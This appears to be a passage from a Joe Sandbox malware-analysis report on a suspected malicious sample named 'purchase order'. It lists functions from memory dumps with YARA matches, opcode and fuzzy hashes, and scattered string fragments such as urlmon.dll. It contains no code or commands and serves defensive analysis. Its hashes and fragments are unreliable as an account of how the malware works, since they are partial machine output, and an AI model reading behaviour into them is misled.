                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-
                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                              • Instruction ID: 92c803a418fd47ec2722b98eb2a175bd6f23d3bf03513df8b40d80f60c8e65b8
                                                                                                              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                              • Instruction Fuzzy Hash: D491A771E802069EDF24DF6DC8806BEBBE5BF88321F94451AE965AF2C0D7329A408751
                                                                                                              Function 01569126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $$@
                                                                                                              • API String ID: 0-1194432280
                                                                                                              • Opcode ID: 30ca48e94eb9de9b74109aa5b530c73a074268dc829a6f431a0b97f50dadfd65
                                                                                                              • Instruction ID: 90d1700f0f7f9c1d2a6427d9090d6cf543c33866c7129f78ea0cfaf62bb8d811
                                                                                                              • Opcode Fuzzy Hash: 30ca48e94eb9de9b74109aa5b530c73a074268dc829a6f431a0b97f50dadfd65
                                                                                                              • Instruction Fuzzy Hash: D181EB71D0026A9FDB35DF94CC45BEEB6B8BB48754F1041DAAA19BB240E7705E84CFA0

                                                                                                              Executed Functions

                                                                                                              Function 037B5311 Relevance: 34.3, Strings: 27, Instructions: 501COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: "1$&E$'S$:f$=$F$Il$L6$LP$PY$Z $\$]s$]sPY$_$`$c$c\$c\$g$j$oS$s$v$w$wP$D
                                                                                                              • API String ID: 0-3100882789
                                                                                                              • Opcode ID: 5a042cf0e0735a2c3b36b4d5b009d706055ce2475e255675c8a94ed943ce693b
                                                                                                              • Instruction ID: 679b2716fd2cfb7797a9ea68f0e4010689413ea310f8b56234e8eab3cc1d24fb
                                                                                                              • Opcode Fuzzy Hash: 5a042cf0e0735a2c3b36b4d5b009d706055ce2475e255675c8a94ed943ce693b
                                                                                                              • Instruction Fuzzy Hash: 8C529DB0D05229CBEB24CF84C998BEDBBB2BB45318F1081DAD44D7B280D7B56A85DF50
                                                                                                              Function 037C31E1 Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 6$O$S$\$s
                                                                                                              • API String ID: 0-3854637164
                                                                                                              • Opcode ID: bf23aa9432873cf03518a53e7bc7455abf27f3ddd51a0245c802110ecd17759d
                                                                                                              • Instruction ID: d866c9e827272939fe3e01d627d4a9f288d8f07b3572894c8e2caf7325680e65
                                                                                                              • Opcode Fuzzy Hash: bf23aa9432873cf03518a53e7bc7455abf27f3ddd51a0245c802110ecd17759d
                                                                                                              • Instruction Fuzzy Hash: C2516576D10318ABDB14EB94DC89FEAB378EF44710F44829DED085B140EB75AB54CBA1
                                                                                                              Function 037D04A1 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: &Cd_
                                                                                                              • API String ID: 0-746913441
                                                                                                              • Opcode ID: 5c891511ddcffe548a61c68face75fe87426266056f99a069d4ac1df79e7fad8
                                                                                                              • Instruction ID: e3bb386817c157ca7eb429c0125f247e0b7288f9721cf5d853472f3b92ebc946
                                                                                                              • Opcode Fuzzy Hash: 5c891511ddcffe548a61c68face75fe87426266056f99a069d4ac1df79e7fad8
                                                                                                              • Instruction Fuzzy Hash: C201D0F6D0121DAFCB41DFE8D9419EEFBF8BB08600F14426AE919F6200F7705A048BA1
                                                                                                              Function 037AE968 Relevance: .1, Instructions: 131COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b45fbb8299b444f6f690778c8069fb8cdd6ca81a7881611312d79426a84a1a3c
                                                                                                              • Instruction ID: 2bfe1c226f3f0961418e893920f7570c27765cda52b47282283d7a4debd98aae
                                                                                                              • Opcode Fuzzy Hash: b45fbb8299b444f6f690778c8069fb8cdd6ca81a7881611312d79426a84a1a3c
                                                                                                              • Instruction Fuzzy Hash: 57410CB1D11229AFDB14CF99C885AEEBBBCFF49710F10415AFA14E6240E7B09640CBA1
                                                                                                              Function 037D3C81 Relevance: .1, Instructions: 85COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4ebc6facd25896281664b8750a2dea360fec6b2184a5f688c675de731d68b5a3
                                                                                                              • Instruction ID: 51b719c6ced7c6e895195b6cf588ab74e6eaafe775ded74dbfe9038b7ecc1a51
                                                                                                              • Opcode Fuzzy Hash: 4ebc6facd25896281664b8750a2dea360fec6b2184a5f688c675de731d68b5a3
                                                                                                              • Instruction Fuzzy Hash: 6031F8B5A00608ABDB14DF98C881EEFB7B9EF88710F108219F909A7240D774A911CFA1
                                                                                                              Function 037D45F1 Relevance: .1, Instructions: 77COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bf33bb16f2c46a21a11e7edf9585b111042fb5818533fd214216d73f8327f827
                                                                                                              • Instruction ID: afd02024915f5cbddff0ef587489aa4a565bf1a4a7e9ed46e49dae0821c563e2
                                                                                                              • Opcode Fuzzy Hash: bf33bb16f2c46a21a11e7edf9585b111042fb5818533fd214216d73f8327f827
                                                                                                              • Instruction Fuzzy Hash: 762116B5A00609ABDB14DF98CC85FEFB7B8EF88710F108519FD19AB240D770A911CBA5
                                                                                                              Function 037C3021 Relevance: .1, Instructions: 75COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a7f6b4cdc90cbb617ecd447e14cd3136dbeaf26399e7dbfdcdf17970354c06e8
                                                                                                              • Instruction ID: 1a78a5a2b50d31717fe6d689a3abdd07829c59ca8943f87e6063305ddf4379bb
                                                                                                              • Opcode Fuzzy Hash: a7f6b4cdc90cbb617ecd447e14cd3136dbeaf26399e7dbfdcdf17970354c06e8
                                                                                                              • Instruction Fuzzy Hash: EA11A0B63803047AF720EA558C43FAB736D9B84B11F244009FB08AE2C0EAB4F81146B9
                                                                                                              Function 037AEB1A Relevance: .1, Instructions: 74COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d7d33b197e29d26b6d9b05018973f997e1e08bcbcfa7e99738ffcf16360b50ea
                                                                                                              • Instruction ID: 34fd18c17293307122e31a2425f59182f1498508672acb62ddf54d7c9ad85961
                                                                                                              • Opcode Fuzzy Hash: d7d33b197e29d26b6d9b05018973f997e1e08bcbcfa7e99738ffcf16360b50ea
                                                                                                              • Instruction Fuzzy Hash: F1113A772086E65BD721CF7CACD4B9BBBE4ABC6634B18036AE8948F582D3318445C750
                                                                                                              Function 037D3A91 Relevance: .1, Instructions: 65COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6a8cdccb619892b952e18b1b76782bbf78c96e0b6e875131917e05f185a69575
                                                                                                              • Instruction ID: 412a80d2ed9908a585c61b328c295142feea4c452a3091e02e3c80ca8935974e
                                                                                                              • Opcode Fuzzy Hash: 6a8cdccb619892b952e18b1b76782bbf78c96e0b6e875131917e05f185a69575
                                                                                                              • Instruction Fuzzy Hash: 72118E75600749BBE720DBA8CC45FEF77BCEB89710F104519F949AB280E7706A108BA1
                                                                                                              Function 037D3911 Relevance: .1, Instructions: 65COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 08c2ba1f561c5432ca12d9fcf3fbdcf32fa6ca1f644453fac7537be90eda06dc
                                                                                                              • Instruction ID: 473d8f49524f57d9724f61b0f61e20f75977e9ca655763dc5d86bd4000bbe4e2
                                                                                                              • Opcode Fuzzy Hash: 08c2ba1f561c5432ca12d9fcf3fbdcf32fa6ca1f644453fac7537be90eda06dc
                                                                                                              • Instruction Fuzzy Hash: BD114C75600745BBE710EBA8CC45FEF77BCEB89710F104549F9599B280D7706A118BA1
                                                                                                              Function 037D0531 Relevance: .1, Instructions: 65COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 423a849d036eb6971466b2a7dc27fc5b7e0a1b1104fcf0ac9bb23fe7c103a971
                                                                                                              • Instruction ID: cc66c71183b4bcadb00d6a7f578814c8fb7092f2f7177d4c23814d7a97efdc7f
                                                                                                              • Opcode Fuzzy Hash: 423a849d036eb6971466b2a7dc27fc5b7e0a1b1104fcf0ac9bb23fe7c103a971
                                                                                                              • Instruction Fuzzy Hash: 4A1100B6D01219AF8B00DFA9D8419EFBBF9FF88210F14426AE915E7200E7705A04CBE1
                                                                                                              Function 037D1871 Relevance: .1, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 955003b43e0c04ed43148c59bdb1caf5191e37eef8db5e55a65cf7704bad13c0
                                                                                                              • Instruction ID: eaa258356416027ae86440b70909b02e10c5dbee174258507cf139273249a966
                                                                                                              • Opcode Fuzzy Hash: 955003b43e0c04ed43148c59bdb1caf5191e37eef8db5e55a65cf7704bad13c0
                                                                                                              • Instruction Fuzzy Hash: 3611EFB6E0121DAF9B00DFA9DD409EEBBF9EF48200F54416AE915E7200E7705A04CBE1
                                                                                                              Function 037C31DB Relevance: .1, Instructions: 62COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4e02e0d7e3b3a53fe3a078bdd5fcac6e3ec5e91085e971d8e4e24b2f4b3ac688
                                                                                                              • Instruction ID: e09dda0bf1c19f61039db14e98ea8582a7721c45e232d828e7e303f030cb253f
                                                                                                              • Opcode Fuzzy Hash: 4e02e0d7e3b3a53fe3a078bdd5fcac6e3ec5e91085e971d8e4e24b2f4b3ac688
                                                                                                              • Instruction Fuzzy Hash: 8211C679A603057FEF20EBA4DC49FAA7378DB55360F04429CF908AB180EB789645C792
                                                                                                              Function 037D4961 Relevance: .0, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 53127c51fb8e915e2ada1bd4b1e5bd03c96a5b42473f202cca94c82170286ba0
                                                                                                              • Instruction ID: ef2f27ade3033e2aa4f558c8b4531b26d16d6aaf491fb7055d656bd16b4e21a7
                                                                                                              • Opcode Fuzzy Hash: 53127c51fb8e915e2ada1bd4b1e5bd03c96a5b42473f202cca94c82170286ba0
                                                                                                              • Instruction Fuzzy Hash: 010180B6214608BBCB44DF99DC80EDB77ADAF8D714F108608BA19E7240D630E851CBA4
                                                                                                              Function 037AEAB5 Relevance: .0, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1780618626ccbedbe31196b8cdaf13b12f6a792b1a6463cb698c66536d5a6e0f
                                                                                                              • Instruction ID: e1a810d63f4cb51d7e8028cb92f9466555071cfda10c5f28d79c138b68187971
                                                                                                              • Opcode Fuzzy Hash: 1780618626ccbedbe31196b8cdaf13b12f6a792b1a6463cb698c66536d5a6e0f
                                                                                                              • Instruction Fuzzy Hash: 81F024736547564FE3108B2CAC84B56F7D8FB84334F280336E8588B681E231A4528390
                                                                                                              Function 037D3B91 Relevance: .0, Instructions: 33COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ce1e9b9ffdd3cac858b1db74bf0ffb8968d36e3b35712da21da7643fa6cd12e9
                                                                                                              • Instruction ID: ee304245ef0038ac3e150a79ade3997e942c5d75ec4eb5b6561848280fdf9972
                                                                                                              • Opcode Fuzzy Hash: ce1e9b9ffdd3cac858b1db74bf0ffb8968d36e3b35712da21da7643fa6cd12e9
                                                                                                              • Instruction Fuzzy Hash: D2F01CB9200609BBDB14DF99DC81EDB77ACEFC9720F104509B91897241D670B9118BB1
                                                                                                              Function 037AEB55 Relevance: .0, Instructions: 31COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0cffbb9c2449f1701d20f72ec4b97821a4ab4570fccf4dc3f4158285aa425be8
                                                                                                              • Instruction ID: 4385bb71169ebe452d2362a9065b9bd7a226be45204b53a37a7dc12e602b6927
                                                                                                              • Opcode Fuzzy Hash: 0cffbb9c2449f1701d20f72ec4b97821a4ab4570fccf4dc3f4158285aa425be8
                                                                                                              • Instruction Fuzzy Hash: F2F02332409AF35BE7698A7CF8C1295FB50F5C273071C0776D9E48C952E665455AC740
                                                                                                              Function 037C3141 Relevance: .0, Instructions: 29COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 42030f2fe2bf68779df69c477925f43a6da38f8270e0870f8dcb97eb83245dcf
                                                                                                              • Instruction ID: eb31e5f3952d51123b53f54873e5309a857ce0a94035b18afa0d9730a0c16153
                                                                                                              • Opcode Fuzzy Hash: 42030f2fe2bf68779df69c477925f43a6da38f8270e0870f8dcb97eb83245dcf
                                                                                                              • Instruction Fuzzy Hash: FDF0827591520DEBDB14CFA4D841BDEBBB8EB04320F1083ADE8249B280D73497509781
                                                                                                              Function 037D4881 Relevance: .0, Instructions: 29COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                                                                              • Instruction ID: 284d06315a0c2f0a213738068fd97fca222aabaad38bc994cc096ab8610295d5
                                                                                                              • Opcode Fuzzy Hash: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                                                                              • Instruction Fuzzy Hash: 27E06D76200608BBC614EE58DC44EDB33ACDFC9720F104408F908A7241CA70B9118BB4
                                                                                                              Function 037C313E Relevance: .0, Instructions: 28COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 031a64e66d3a0a6018d0005e5181440eaf49b662aee38cd8967d16bbceb66496
                                                                                                              • Instruction ID: 01775fba65962cddef117403827945876b835bdc976849380cb562984de4b725
                                                                                                              • Opcode Fuzzy Hash: 031a64e66d3a0a6018d0005e5181440eaf49b662aee38cd8967d16bbceb66496
                                                                                                              • Instruction Fuzzy Hash: 9AF06575969108AFEB04CB68D881ADEBB74DB09320F1483ADE815DB280D33987549791
                                                                                                              Function 037D6731 Relevance: .0, Instructions: 28COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0c9ae20bbf7d28002097368b2745013456a803fa7e5a7aa848e8f5b8a8e98eff
                                                                                                              • Instruction ID: a5037e7fb9a5b9c63e73b8b84c0f2d35132d10923f0f527f9eb587c88d07d357
                                                                                                              • Opcode Fuzzy Hash: 0c9ae20bbf7d28002097368b2745013456a803fa7e5a7aa848e8f5b8a8e98eff
                                                                                                              • Instruction Fuzzy Hash: BEE08676A0031437C220A6899C09FA7B77CCBC1EB0F490078FE089B340E970A90082E4
                                                                                                              Function 037D4561 Relevance: .0, Instructions: 25COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                                                                              • Instruction ID: 46654ebf694b161f0c8f723256d95ed2c7ab18f0a9d48de3cae8268964997d85
                                                                                                              • Opcode Fuzzy Hash: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                                                                              • Instruction Fuzzy Hash: AAE0467A2006187BC620EA69DC40FDBB76CEBC9720F104419FA08AB241CA70BA118BB1
                                                                                                              Function 037B5D69 Relevance: .0, Instructions: 13COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5d5815d1f8a452eda6934f25c8a6f7b5b64b76481de00b6d5451595b95264a94
                                                                                                              • Instruction ID: e40cc966d76c975b91e27aa33f3ee45204cac98c01bc8aa6a8a76435ea86bbea
                                                                                                              • Opcode Fuzzy Hash: 5d5815d1f8a452eda6934f25c8a6f7b5b64b76481de00b6d5451595b95264a94
                                                                                                              • Instruction Fuzzy Hash: 63C01236115142DAC701FB61878419BBF32EE872143741A81C0811F96B977118A9C641

                                                                                                              Non-executed Functions

                                                                                                              Function 037CDA11 Relevance: 34.0, Strings: 27, Instructions: 264COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                                              • API String ID: 0-1002149817
                                                                                                              • Opcode ID: 915587c63906c7f028a4648f15c33dc055c96a600cbdf6225bd1b9e8e1f1076a
                                                                                                              • Instruction ID: 70d8ad53067fc01e506241f7ab6d3c667e584e64672797f8e9c77c0793696a6b
                                                                                                              • Opcode Fuzzy Hash: 915587c63906c7f028a4648f15c33dc055c96a600cbdf6225bd1b9e8e1f1076a
                                                                                                              • Instruction Fuzzy Hash: 01C12EB5D00368AEDB61DFA4CC44BEEBBB9AF05304F0081DDD548AB241E7B55A88CF95
                                                                                                              Function 037C6001 Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                              • API String ID: 0-392141074
                                                                                                              • Opcode ID: 070ab7f66e8d9c04ed6f4c8a2de89e5a9f8ed64d5bacfa885cc3545c8b1cb9dc
                                                                                                              • Instruction ID: abb5811cdf4a60b8aa1bbbd080df73bef4c572d2af4c55de60f9a627ec37eaca
                                                                                                              • Opcode Fuzzy Hash: 070ab7f66e8d9c04ed6f4c8a2de89e5a9f8ed64d5bacfa885cc3545c8b1cb9dc
                                                                                                              • Instruction Fuzzy Hash: 1A7132B5D10318AADB65DFA4CC84FDEB77DAF48700F408199E50CAA140EF756B888FA5
                                                                                                              Function 037B9C08 Relevance: 13.8, Strings: 11, Instructions: 87COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                              • API String ID: 0-685823316
                                                                                                              • Opcode ID: 5bd7519a139b4a50a57840ebba9e22ae570f8fa15fabef404c282f35a4f17931
                                                                                                              • Instruction ID: db0dfc8be50a8ba37885c8b14de76454b2ff31b2c4f9879aa91375329ea539a6
